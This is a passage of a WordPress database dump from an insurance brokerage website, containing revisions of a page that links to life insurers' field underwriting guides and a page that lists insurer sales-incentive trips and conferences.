target=\"_blank\">AIG</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AXA-Field-Underwriting-Guide.pdf\" target=\"_blank\">AXA</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/JH-Field-Underwriting-Guide.pdf\" target=\"_blank\">John Hancock</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/LFD-Field-Underwriting-Guide.pdf\" target=\"_blank\">Lincoln Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MoneyGuard-UW-Resources.pdf\" target=\"_blank\">Lincoln MoneyGuard</a></li>\r\n <li><span style=\"text-decoration: underline;\">Mass Mutual</span></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/BDUW24751_Life_UW_Guide-FINAL_April-2015.pdf\" target=\"_blank\">MetLife</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MOO-Life-Underwriting-Guide-July-2015.pdf\" target=\"_blank\">Mutual of Omaha</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRN-Field-Underwriting-Guide.pdf\" target=\"_blank\">Principal Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRO-Field-Underwriting-Guide.pdf\" target=\"_blank\">Protective Life</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Sym-Field-Underwriting-Guide.pdf\" target=\"_blank\">Symetra Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/TA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Transamerica</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/VYA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Voya Financial</a></li>\r\n</ul>\r\n<p style=\"text-align: justify;\">What’s included in these Field Underwriting Guides? All of the publicly available information regarding Age and Amount Requirements, Approved Vendors, Preferred Guidelines, Build Charts, and insight into how the Core Carrier views certain medical conditions.</p>','Carrier Field Underwriting Guides','','inherit','open','open','','379-revision-v1','','','2015-12-09 16:09:06','2015-12-09 16:09:06','',379,'http://www.empireins.com/379-revision-v1/',0,'revision','',0),(423,1,'2015-12-09 16:13:29','2015-12-09 16:13:29','','MM-Field-Underwriting-Guide','','inherit','open','open','','mm-field-underwriting-guide','','','2015-12-09 16:13:29','2015-12-09 16:13:29','',4,'http://www.empireins.com/wp-content/uploads/2014/04/MM-Field-Underwriting-Guide.pdf',0,'attachment','application/pdf',0),(424,1,'2015-12-09 16:15:50','2015-12-09 16:15:50','<p style=\"text-align: justify;\"><strong>In some cases, there is a clear-cut answer to an underwriting question, and you can find most of those answers in the Core Carrier Field Underwriting Guides listed below. Not sure that the answer to your questions is definitive? Give the EIB Team a call.</strong></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Core Carrier Field Underwriting Guides</h4>\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/ACC-Field-Underwriting-Guide.pdf\" target=\"_blank\">Accordia Life</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AIG-UW-Guide-06-08-2015.pdf\" target=\"_blank\">AIG</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AXA-Field-Underwriting-Guide.pdf\" target=\"_blank\">AXA</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/JH-Field-Underwriting-Guide.pdf\" target=\"_blank\">John Hancock</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/LFD-Field-Underwriting-Guide.pdf\" target=\"_blank\">Lincoln Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MoneyGuard-UW-Resources.pdf\" target=\"_blank\">Lincoln MoneyGuard</a></li>\r\n <li><a title=\"MM-Field-Underwriting-Guide.pdf\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/MM-Field-Underwriting-Guide.pdf\" target=\"_blank\">Mass Mutual</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/BDUW24751_Life_UW_Guide-FINAL_April-2015.pdf\" target=\"_blank\">MetLife</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MOO-Life-Underwriting-Guide-July-2015.pdf\" target=\"_blank\">Mutual of Omaha</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRN-Field-Underwriting-Guide.pdf\" target=\"_blank\">Principal Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRO-Field-Underwriting-Guide.pdf\" target=\"_blank\">Protective Life</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Sym-Field-Underwriting-Guide.pdf\" target=\"_blank\">Symetra Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/TA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Transamerica</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/VYA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Voya Financial</a></li>\r\n</ul>\r\n<p style=\"text-align: justify;\">What’s included in these Field Underwriting Guides? All of the publicly available information regarding Age and Amount Requirements, Approved Vendors, Preferred Guidelines, Build Charts, and insight into how the Core Carrier views certain medical conditions.</p>','Carrier Field Underwriting Guides','','inherit','open','open','','379-revision-v1','','','2015-12-09 16:15:50','2015-12-09 16:15:50','',379,'http://www.empireins.com/379-revision-v1/',0,'revision','',0),(425,1,'2015-12-09 16:20:37','2015-12-09 16:20:37','','Pru-Field-Underwriting-Guide','','inherit','open','open','','pru-field-underwriting-guide','','','2015-12-09 16:20:37','2015-12-09 16:20:37','',4,'http://www.empireins.com/wp-content/uploads/2014/04/Pru-Field-Underwriting-Guide.pdf',0,'attachment','application/pdf',0),(426,1,'2015-12-09 16:22:56','2015-12-09 16:22:56','<p style=\"text-align: justify;\"><strong>In some cases, there is a clear-cut answer to an underwriting question, and you can find most of those answers in the Core Carrier Field Underwriting Guides listed below. Not sure that the answer to your questions is definitive? Give the EIB Team a call.</strong></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Core Carrier Field Underwriting Guides</h4>\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/ACC-Field-Underwriting-Guide.pdf\" target=\"_blank\">Accordia Life</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AIG-UW-Guide-06-08-2015.pdf\" target=\"_blank\">AIG</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AXA-Field-Underwriting-Guide.pdf\" target=\"_blank\">AXA</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/JH-Field-Underwriting-Guide.pdf\" target=\"_blank\">John Hancock</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/LFD-Field-Underwriting-Guide.pdf\" target=\"_blank\">Lincoln Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MoneyGuard-UW-Resources.pdf\" target=\"_blank\">Lincoln MoneyGuard</a></li>\r\n <li><a title=\"MM-Field-Underwriting-Guide.pdf\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/MM-Field-Underwriting-Guide.pdf\" target=\"_blank\">Mass Mutual</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/BDUW24751_Life_UW_Guide-FINAL_April-2015.pdf\" target=\"_blank\">MetLife</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MOO-Life-Underwriting-Guide-July-2015.pdf\" target=\"_blank\">Mutual of Omaha</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRN-Field-Underwriting-Guide.pdf\" target=\"_blank\">Principal Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRO-Field-Underwriting-Guide.pdf\" target=\"_blank\">Protective Life</a></li>\r\n <li><a title=\"Pru-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/Pru-Field-Underwriting-Guide.pdf\" target=\"_blank\">Prudential Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Sym-Field-Underwriting-Guide.pdf\" target=\"_blank\">Symetra Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/TA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Transamerica</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/VYA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Voya Financial</a></li>\r\n</ul>\r\n<p style=\"text-align: justify;\">What’s included in these Field Underwriting Guides? All of the publicly available information regarding Age and Amount Requirements, Approved Vendors, Preferred Guidelines, Build Charts, and insight into how the Core Carrier views certain medical conditions.</p>','Carrier Field Underwriting Guides','','inherit','open','open','','379-revision-v1','','','2015-12-09 16:22:56','2015-12-09 16:22:56','',379,'http://www.empireins.com/379-revision-v1/',0,'revision','',0),(427,1,'2015-12-09 16:25:46','2015-12-09 16:25:46','','PM-Field-Underwriting-Guide','','inherit','open','open','','pm-field-underwriting-guide','','','2015-12-09 16:25:46','2015-12-09 16:25:46','',4,'http://www.empireins.com/wp-content/uploads/2014/04/PM-Field-Underwriting-Guide.pdf',0,'attachment','application/pdf',0),(428,1,'2015-12-09 16:26:33','2015-12-09 16:26:33','<p style=\"text-align: justify;\"><strong>In some cases, there is a clear-cut answer to an underwriting question, and you can find most of those answers in the Core Carrier Field Underwriting Guides listed below. Not sure that the answer to your questions is definitive? Give the EIB Team a call.</strong></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Core Carrier Field Underwriting Guides</h4>\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/ACC-Field-Underwriting-Guide.pdf\" target=\"_blank\">Accordia Life</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AIG-UW-Guide-06-08-2015.pdf\" target=\"_blank\">AIG</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AXA-Field-Underwriting-Guide.pdf\" target=\"_blank\">AXA</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/JH-Field-Underwriting-Guide.pdf\" target=\"_blank\">John Hancock</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/LFD-Field-Underwriting-Guide.pdf\" target=\"_blank\">Lincoln Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MoneyGuard-UW-Resources.pdf\" target=\"_blank\">Lincoln MoneyGuard</a></li>\r\n <li><a title=\"MM-Field-Underwriting-Guide.pdf\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/MM-Field-Underwriting-Guide.pdf\" target=\"_blank\">Mass Mutual</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/BDUW24751_Life_UW_Guide-FINAL_April-2015.pdf\" target=\"_blank\">MetLife</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MOO-Life-Underwriting-Guide-July-2015.pdf\" target=\"_blank\">Mutual of Omaha</a></li>\r\n <li><a title=\"PM-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/PM-Field-Underwriting-Guide.pdf\" target=\"_blank\">Penn Mutual</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRN-Field-Underwriting-Guide.pdf\" target=\"_blank\">Principal Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRO-Field-Underwriting-Guide.pdf\" target=\"_blank\">Protective Life</a></li>\r\n <li><a title=\"Pru-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/Pru-Field-Underwriting-Guide.pdf\" target=\"_blank\">Prudential Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Sym-Field-Underwriting-Guide.pdf\" target=\"_blank\">Symetra Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/TA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Transamerica</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/VYA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Voya Financial</a></li>\r\n</ul>\r\n<p style=\"text-align: justify;\">What’s included in these Field Underwriting Guides? All of the publicly available information regarding Age and Amount Requirements, Approved Vendors, Preferred Guidelines, Build Charts, and insight into how the Core Carrier views certain medical conditions.</p>','Carrier Field Underwriting Guides','','inherit','open','open','','379-revision-v1','','','2015-12-09 16:26:33','2015-12-09 16:26:33','',379,'http://www.empireins.com/379-revision-v1/',0,'revision','',0),(429,1,'2015-12-09 16:32:54','2015-12-09 16:32:54','','L&G-Field-Underwriting-Guide','','inherit','open','open','','lg-field-underwriting-guide','','','2015-12-09 16:32:54','2015-12-09 16:32:54','',4,'http://www.empireins.com/wp-content/uploads/2014/04/LG-Field-Underwriting-Guide.pdf',0,'attachment','application/pdf',0),(430,1,'2015-12-09 16:33:33','2015-12-09 16:33:33','<p style=\"text-align: justify;\"><strong>In some cases, there is a clear-cut answer to an underwriting question, and you can find most of those answers in the Core Carrier Field Underwriting Guides listed below. Not sure that the answer to your questions is definitive? Give the EIB Team a call.</strong></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Core Carrier Field Underwriting Guides</h4>\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/ACC-Field-Underwriting-Guide.pdf\" target=\"_blank\">Accordia Life</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AIG-UW-Guide-06-08-2015.pdf\" target=\"_blank\">AIG</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AXA-Field-Underwriting-Guide.pdf\" target=\"_blank\">AXA</a></li>\r\n <li><a title=\"LG-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/LG-Field-Underwriting-Guide.pdf\" target=\"_blank\">Banner Life/William Penn</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/JH-Field-Underwriting-Guide.pdf\" target=\"_blank\">John Hancock</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/LFD-Field-Underwriting-Guide.pdf\" target=\"_blank\">Lincoln Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MoneyGuard-UW-Resources.pdf\" target=\"_blank\">Lincoln MoneyGuard</a></li>\r\n <li><a title=\"MM-Field-Underwriting-Guide.pdf\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/MM-Field-Underwriting-Guide.pdf\" target=\"_blank\">Mass Mutual</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/BDUW24751_Life_UW_Guide-FINAL_April-2015.pdf\" target=\"_blank\">MetLife</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MOO-Life-Underwriting-Guide-July-2015.pdf\" target=\"_blank\">Mutual of Omaha</a></li>\r\n <li><a title=\"PM-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/PM-Field-Underwriting-Guide.pdf\" target=\"_blank\">Penn Mutual</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRN-Field-Underwriting-Guide.pdf\" target=\"_blank\">Principal Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRO-Field-Underwriting-Guide.pdf\" target=\"_blank\">Protective Life</a></li>\r\n <li><a title=\"Pru-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/Pru-Field-Underwriting-Guide.pdf\" target=\"_blank\">Prudential Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Sym-Field-Underwriting-Guide.pdf\" target=\"_blank\">Symetra Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/TA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Transamerica</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/VYA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Voya Financial</a></li>\r\n</ul>\r\n<p style=\"text-align: justify;\">What’s included in these Field Underwriting Guides? All of the publicly available information regarding Age and Amount Requirements, Approved Vendors, Preferred Guidelines, Build Charts, and insight into how the Core Carrier views certain medical conditions.</p>','Carrier Field Underwriting Guides','','inherit','open','open','','379-revision-v1','','','2015-12-09 16:33:33','2015-12-09 16:33:33','',379,'http://www.empireins.com/379-revision-v1/',0,'revision','',0),(431,1,'2015-12-09 21:48:30','2015-12-09 21:48:30','','NYL-Field-Underwriting-Guide','','inherit','open','open','','nyl-field-underwriting-guide','','','2015-12-09 21:48:30','2015-12-09 21:48:30','',4,'http://www.empireins.com/wp-content/uploads/2014/04/NYL-Field-Underwriting-Guide.pdf',0,'attachment','application/pdf',0),(432,1,'2015-12-09 21:49:28','2015-12-09 21:49:28','<p style=\"text-align: justify;\"><strong>In some cases, there is a clear-cut answer to an underwriting question, and you can find most of those answers in the Core Carrier Field Underwriting Guides listed below. Not sure that the answer to your questions is definitive? Give the EIB Team a call.</strong></p>\r\n\r\n\r\n<hr />\r\n\r\n<h4 style=\"text-align: justify;\">Core Carrier Field Underwriting Guides</h4>\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/ACC-Field-Underwriting-Guide.pdf\" target=\"_blank\">Accordia Life</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AIG-UW-Guide-06-08-2015.pdf\" target=\"_blank\">AIG</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/AXA-Field-Underwriting-Guide.pdf\" target=\"_blank\">AXA</a></li>\r\n <li><a title=\"LG-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/LG-Field-Underwriting-Guide.pdf\" target=\"_blank\">Banner Life/William Penn</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/JH-Field-Underwriting-Guide.pdf\" target=\"_blank\">John Hancock</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/LFD-Field-Underwriting-Guide.pdf\" target=\"_blank\">Lincoln Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MoneyGuard-UW-Resources.pdf\" target=\"_blank\">Lincoln MoneyGuard</a></li>\r\n <li><a title=\"MM-Field-Underwriting-Guide.pdf\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/MM-Field-Underwriting-Guide.pdf\" target=\"_blank\">Mass Mutual</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/BDUW24751_Life_UW_Guide-FINAL_April-2015.pdf\" target=\"_blank\">MetLife</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/MOO-Life-Underwriting-Guide-July-2015.pdf\" target=\"_blank\">Mutual of Omaha</a></li>\r\n <li><a title=\"NYL-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/NYL-Field-Underwriting-Guide.pdf\" target=\"_blank\">New York Life</a></li>\r\n <li><a title=\"PM-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/PM-Field-Underwriting-Guide.pdf\" target=\"_blank\">Penn Mutual</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRN-Field-Underwriting-Guide.pdf\" target=\"_blank\">Principal Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/PRO-Field-Underwriting-Guide.pdf\" target=\"_blank\">Protective Life</a></li>\r\n <li><a title=\"Pru-Field-Underwriting-Guide\" href=\"http://www.empireins.com/wp-content/uploads/2014/04/Pru-Field-Underwriting-Guide.pdf\" target=\"_blank\">Prudential Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Sym-Field-Underwriting-Guide.pdf\" target=\"_blank\">Symetra Financial</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/TA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Transamerica</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/VYA-Field-Underwriting-Guide.pdf\" target=\"_blank\">Voya Financial</a></li>\r\n</ul>\r\n<p style=\"text-align: justify;\">What’s included in these Field Underwriting Guides? All of the publicly available information regarding Age and Amount Requirements, Approved Vendors, Preferred Guidelines, Build Charts, and insight into how the Core Carrier views certain medical conditions.</p>','Carrier Field Underwriting Guides','','inherit','open','open','','379-revision-v1','','','2015-12-09 21:49:28','2015-12-09 21:49:28','',379,'http://www.empireins.com/379-revision-v1/',0,'revision','',0),(433,1,'2015-12-10 18:45:36','2015-12-10 18:45:36','<p class=\"page-post-sub-content\">It is said that hard work is it\'s own reward, and while that is true, it is also great to get away and recharge. The insurance companies below can help you do just that with a little concentrated effort.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h1 class=\"page-post-sub-content\">Insurance Company Incentives</h1>\r\n<ul>\r\n <li><strong>American National</strong></li>\r\n <li><strong>Assurity</strong>: <a href=\"http://mrk.assurity.com/LeadersConf/2016/HIBlast_0315.htm\" target=\"_blank\">2016 Leader\'s Conference</a></li>\r\n <li><strong>John Hancock</strong>\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/2016-JH-Insurance-Summit-Flyer_Producer.pdf\">2016 Insurance Summit</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/South-Africa-PRODUCER.pdf\">2016 South Africa Luxury Adventure</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Term-Summit-2016.pdf\">2016 Term Summit</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>Lincoln Financial</strong></li>\r\n <li><strong>Mutual Of Omaha</strong></li>\r\n <li> <a href=\"http://mutualsalesleaders.com/\" target=\"_blank\">Mutual Sales Leader</a></li>\r\n <li><strong>Transamerica</strong>\r\n<ul>\r\n <li>Leading Distributors Club Convention: <a href=\"http://www.engagengo.com/transamericabarcelona/site/index.php?id=splash\" target=\"_blank\">Experience Barcelona</a></li>\r\n <li><a href=\"http://www.engagengo.com/transamerica51976/site/index.php?id=1\" target=\"_blank\">Break Away and Travel</a></li>\r\n</ul>\r\n</li>\r\n</ul>\r\n \r\n\r\n ','incentives','','inherit','open','open','','10-revision-v1','','','2015-12-10 18:45:36','2015-12-10 18:45:36','',10,'http://www.empireins.com/10-revision-v1/',0,'revision','',0),(434,1,'2015-12-10 19:01:28','2015-12-10 19:01:28','<p class=\"page-post-sub-content\">It is said that hard work is it\'s own reward, and while that is true, it is also great to get away and recharge. The insurance companies below can help you do just that with a little concentrated effort.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h1 class=\"page-post-sub-content\">Insurance Company Incentives</h1>\r\n<ul>\r\n <li><strong>American National</strong></li>\r\n <li><strong>Assurity</strong>: <a href=\"http://mrk.assurity.com/LeadersConf/2016/HIBlast_0315.htm\" target=\"_blank\">2016 Leader\'s Conference</a></li>\r\n <li><strong>John Hancock</strong>\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/2016-JH-Insurance-Summit-Flyer_Producer.pdf\">2016 Insurance Summit</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/South-Africa-PRODUCER.pdf\">2016 South Africa Luxury Adventure</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Term-Summit-2016.pdf\">2016 Term Summit</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>Lincoln Financial</strong></li>\r\n <li><strong>Mutual Of Omaha </strong><a href=\"http://mutualsalesleaders.com/\" target=\"_blank\">Mutual Sales Leader</a></li>\r\n <li><strong>Transamerica</strong>\r\n<ul>\r\n <li>Leading Distributors Club Convention: <a href=\"http://www.engagengo.com/transamericabarcelona/site/index.php?id=splash\" target=\"_blank\">Experience Barcelona</a></li>\r\n <li><a href=\"http://www.engagengo.com/transamerica51976/site/index.php?id=1\" target=\"_blank\">Break Away and Travel</a></li>\r\n</ul>\r\n</li>\r\n</ul>\r\n \r\n\r\n ','incentives','','inherit','open','open','','10-revision-v1','','','2015-12-10 19:01:28','2015-12-10 19:01:28','',10,'http://www.empireins.com/10-revision-v1/',0,'revision','',0),(436,1,'2015-12-10 20:16:32','2015-12-10 20:16:32','<p class=\"page-post-sub-content\">It is said that hard work is it\'s own reward, and while that is true, it is also great to get away and recharge. The insurance companies below can help you do just that with a little concentrated effort.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h1 class=\"page-post-sub-content\">Insurance Company Incentives</h1>\r\n<ul>\r\n <li><strong>American National</strong></li>\r\n <li><strong>Assurity</strong>: <a href=\"http://mrk.assurity.com/LeadersConf/2016/HIBlast_0315.htm\" target=\"_blank\">2016 Leader\'s Conference</a></li>\r\n <li><strong>John Hancock</strong>\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/2016-JH-Insurance-Summit-Flyer_Producer.pdf\">2016 Insurance Summit</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/South-Africa-PRODUCER.pdf\">2016 South Africa Luxury Adventure</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Term-Summit-2016.pdf\">2016 Term Summit</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>Lincoln Financial</strong></li>\r\n <li><strong>Mutual Of Omaha </strong>\r\n<ul>\r\n <li><strong> </strong><a href=\"http://mutualsalesleaders.com/\" target=\"_blank\">Mutual Sales Leader</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>Transamerica</strong>\r\n<ul>\r\n <li>Leading Distributors Club Convention: <a href=\"http://www.engagengo.com/transamericabarcelona/site/index.php?id=splash\" target=\"_blank\">Experience Barcelona</a></li>\r\n <li><a href=\"http://www.engagengo.com/transamerica51976/site/index.php?id=1\" target=\"_blank\">Break Away and Travel</a></li>\r\n</ul>\r\n</li>\r\n</ul>\r\n \r\n\r\n ','incentives','','inherit','open','open','','10-revision-v1','','','2015-12-10 20:16:32','2015-12-10 20:16:32','',10,'http://www.empireins.com/10-revision-v1/',0,'revision','',0),(437,1,'2015-12-10 20:43:28','2015-12-10 20:43:28','<p class=\"page-post-sub-content\">It is said that hard work is it\'s own reward, and while that is true, it is also great to get away and recharge. The insurance companies below can help you do just that with a little concentrated effort.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h1 class=\"page-post-sub-content\">Insurance Company Incentives</h1>\r\n<ul>\r\n <li><strong>American National</strong></li>\r\n <li><strong>Assurity</strong>: <a href=\"http://mrk.assurity.com/LeadersConf/2016/HIBlast_0315.htm\" target=\"_blank\">2016 Leader\'s Conference</a></li>\r\n <li><strong>John Hancock</strong>\r\n<ul>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/2016-JH-Insurance-Summit-Flyer_Producer.pdf\">2016 Insurance Summit</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/South-Africa-PRODUCER.pdf\">2016 South Africa Luxury Adventure</a></li>\r\n <li><a href=\"http://www.empireins.com/wp-content/uploads/2015/11/Term-Summit-2016.pdf\">2016 Term Summit</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>Lincoln Financial</strong></li>\r\n <li><strong>Mutual Of Omaha </strong>\r\n<ul>\r\n <li><strong> </strong><a href=\"http://mutualsalesleaders.com/\" target=\"_blank\">Mutual Sales Leader</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>Penn Mutual </strong>\r\n<ul>\r\n <li><a href=\"https://www.travelhq.com/events/pennmutualgoldeneagle2016/pretrip/home.mtc\" target=\"_blank\">2016 Golden Eagle</a></li>\r\n <li><a href=\"https://www.travelhq.com/events/pennmutualroyalblue2016/pretrip/home.mtc\" target=\"_blank\">2016 Royal Blue</a></li>\r\n</ul>\r\n</li>\r\n <li><strong>Transamerica</strong>\r\n<ul>\r\n <li>Leading Distributors Club Convention: <a href=\"http://www.engagengo.com/transamericabarcelona/site/index.php?id=splash\" target=\"_blank\">Experience Barcelona</a></li>\r\n <li><a href=\"http://www.engagengo.com/transamerica51976/site/index.php?id=1\" target=\"_blank\">Break Away and Travel</a></li>\r\n</ul>\r\n</li>\r\n</ul>\r\n \r\n\r\n ','incentives','','inherit','open','open','','10-revision-v1','','','2015-12-10 20:43:28','2015-12-10 20:43:28','',10,'http://www.empireins.com/10-revision-v1/',0,'revision','',0),(439,1,'2015-12-10 20:48:04','2015-12-10 20:48:04','','ANICO 2016_conference','','inherit','open','open','','anico-2016_conference','','','2015-12-10 20:48:04','2015-12-10 20:48:04','',4,'http://www.empireins.com/wp-content/uploads/2014/04/ANICO-2016_conference.pdf',0,'attachment','application/pdf',0),(440,1,'2015-12-10 20:50:08','2015-12-10 20:50:08','<p class=\"page-post-sub-content\">It is said that hard work is it\'s own reward, and while that is true, it is also great to get away and recharge. The insurance companies below can help you do just that with a little concentrated effort.</p>\r\n\r\n\r\n<hr />\r\n\r\n<h1 class=\"page-post-sub-content\">Insurance Company Incentives</h1>\r\n<ul>\r\n <li><strong>American National</strong>\r\n<ul>\r\n <li><a 